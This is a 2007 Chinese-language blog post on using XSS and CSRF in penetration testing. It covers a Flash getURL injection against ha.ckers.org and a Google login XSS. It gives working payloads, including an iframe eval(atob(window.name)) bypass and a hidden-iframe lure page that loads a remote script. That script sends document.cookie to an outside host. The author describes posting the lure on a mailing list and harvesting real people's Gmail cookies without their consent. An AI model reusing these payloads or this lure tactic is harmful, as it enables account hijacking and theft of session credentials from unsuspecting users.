<<  Bypass htmlentities | 首页 | Request变量与csrf  >>

  • 2007-11-29

    xss/csrf in penetration test

    版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
    http://superhei.blogbus.com/logs/11257167.html

    xss/csrf in penetration test

    author: superhei
    date: 2007-11-29
    team:http://www.ph4nt0m.org
    blog:http://superhei.blogbus.com

    一.Owning Ha.ckers.org

    前段时间在Sirdarckcat和Kuza55一起"Owning Ha.ckers.org"中,就是利用xss等的攻击进行渗透[然后没有成功,但是里面的技术细节值得学习],具体技术细节请参考:
    1.Sirdarckcat的 blog:http://sirdarckcat.blogspot.com/2007/11/inside-history-of-hacking-rsnake-for.html
    2.rSnake的blog:http://ha.ckers.org/blog/20071104/owning-hackersorg-or-not/

    首先他们利用了以前rsnake用来测试xss的一个flash:http://ha.ckers.org/xss.swf [现在已经拒绝访问了],由于这个flash本身存在一个xss[Cross Site Flashing:请参考Stefano Di Paola的文档Testing Flash Applications],as2的代码like this:

    getURL("javascript:alert('xss')", "_self", "GET");
    stop();

    在"Flash Lite 2.x ActionScript 语言参考"里有这样的描叙http://livedocs.adobe.com/flashlite/2_cn/main/00000160.html:
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
    getURL(url:String [, window:String [, method:String] ]) :Void
    .....
    method:String [可选] -- 用于发送变量的 GET 或 POST 方法。如果没有变量,则省略此参数。GET 方法将变量追加到 URL 的末尾,它用于发送少量的变量。POST 方法在单独的 HTTP 标头中发送变量,它用于发送大量的变量。
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
    当我们指定第3个参数method:String 为get或者post,可以提交变量追加到url末尾,这个也就意味着getURL函数的url可以injection something :). 我们回到xss.swf
    我们提交: xss.swf?a=0:0;eval(alert('xss');

    as2里:getURL("javascript:alert('xss')?a=0:0;eval(alert('xss');", "_self", "GET");
    注意那个?和后面都加到了url的后面,Sirdarckcat使用js的一个3元条件a=0:0;巧妙的闭和了语句.

    demo: http://60.190.243.111/superhei/xss/xss.swf?a=0:0;eval(alert('xss2'));

    成功完成了xss.

    在Sirdarckcat的poc里使用的是:
    <iframe src="http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;" name="....[playload]"></iframe>

    这里他们认为rSnake使用ff+noscript,所以使用上面pass noscript,当然现在noscript已经修补了这个bug.

    a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;
    这个也就是
    eval(atob(window.name)).

    atob=decode base64

    这个又是他们的一个技巧,使用编码饶过一些检测 ..

    他的playload好象就是利用一个csrf发了一个blog? 具体没有去看wp的代码 :).

    在irc里我问过Sirdarckcat为什么他不用,得到cookie然后欺骗进后台,他说好象是后台可能禁止了他的ip登陆.

    在整个过程,Sirdarckcat和Kuza55利用了n个细节来达到目的,因为他们的目标也是一位xss的牛人,比如还先利用了css来取浏览器的访问历史,来判断目标是不是进过后台[利用css的目的是no script] 等等....

    二.Owning Some-Hacks's Gmail

    也是前段时间jx发现了google登陆口的一个xss: http://www.xfocus.net/articles/200711/957.html,在xf公布之前,我使用这个bug测试一下,结果我得到了国内很多搞安全的人的gmail的cookie :)

    xss点:
    https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#"></script><script>alert('xss')</script>&1-=1

    利用:经常测试发现这个是一个https的xss,在ie下使用iframe调用时得不到gmail的cookie[当然利用利用jx那文章里提到的window.location但是不够隐蔽],我们的目标是搞安全的,一般的安全意识还是有的,而且现在搞安全的一般都是使用ff,因为ie太不安全,所以我决定先只考虑ff....

    创建iframe的代码如下[感谢luoluo的指点:)]:

    <html><body>
    <iframe src="" id="f"></iframe>
    <script>
    foourl='';
    document.getElementById("f").src='https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#"></sc'+'ript><scr'+'ipt src="http://60.190.243.111/superhei/ieav/gm.js"></scr'+'ipt>';alert(document.getElementById("f").src);document.getElementById("f").style.width = 0;document.getElementById("f").style.height = 0;
    </script>
    </body>
    </html>
    我的playload放在远程的一个js里:http://60.190.243.111/superhei/ieav/gm.js

    那么怎么让目标访问呢,哈哈,这里幻影的maillist帮了我一个大忙,maillist简直都是我测试的理想场所 .

    首先我在maillist发了一个phpcms的漏洞公告,里面的内容就是一个link:http://60.190.243.111/superhei/ieav/phpcms.htm,这里phpcms.htm里有我发现的phpcms漏洞的简单分析[由于只是测试,我没有发很引诱人的东西,如ie0day什么的,分析也写的很简单],当然也有我上面构造的xss的代码.

    我们看看真正的playload:http://60.190.243.111/superhei/ieav/gm.js的代码:

    getURL("http://xxx.com/test.asp?cn="+encodeURIComponent(document.cookie));

    function getURL(s) {
        var image = new Image();
        image.style.width = 0;
        image.style.height = 0;
        image.src = s;
    }

    利用Image发送cookie.

    然后在maillist发布我的贴以后,我就去上晚班了,等我第2天早上9:00下班后,发现我的数据库里躺着n个人的cookie :)

    在整个过程,我以为我的行为会被人发现,遗憾的是一直没有人跟贴反应,只有一个朋友我们的boy同学用noscript拦截了我的攻击,说实话开始之前我对noscript一无所知,所以根本没有考虑,由此国内安全人员自己的安全意识也要加强了. 这个攻击其实没什么新东西 也没有Sirdarckcat那么的技术细节考虑但是效果还是明显的,回想起以前lis0利用xss进我163的mail时,可能也是利用了相同的伎俩?

    三.后话
       xss和csrf是我见过最卑鄙无耻的攻击方法,尤其是csrf[虽然上面的例子没有涉及],这个也是我一直bs它们的理由,在bs他们的同时我们应该去了解他们,因为'黑客无处不在' :)
       在国内好多人在提到xss的时候只是来个alert,真正利用还是很麻烦,而且真正用到渗透测试中更加少了...,不过我有理由相信在以后的渗透测试里,会出现更加多xss/csrf等等 攻击手段.
        [最好,感谢和我一起交流,一起学习的朋友们!]

    随机文章:

    Google-Xss 2007-11-05
    GRASP 2007-08-23
    php往届bugs 2006-04-13

    收藏到:Del.icio.us




    Tag:
    引用地址:
    superhei 发表于17:14:50 | 编辑 | 继续话题 | 转发 | 分享 0

    评论

  • can xss fuck the world??
    flyh4t | 发表于2007-11-29 22:30:13 [回复]
  • 头顶一片大叶子坐板凳。
    jno | 发表于2007-11-29 18:22:34 [回复]
  • 这么大个沙发~
    茄子 | 发表于2007-11-29 18:15:11 [回复]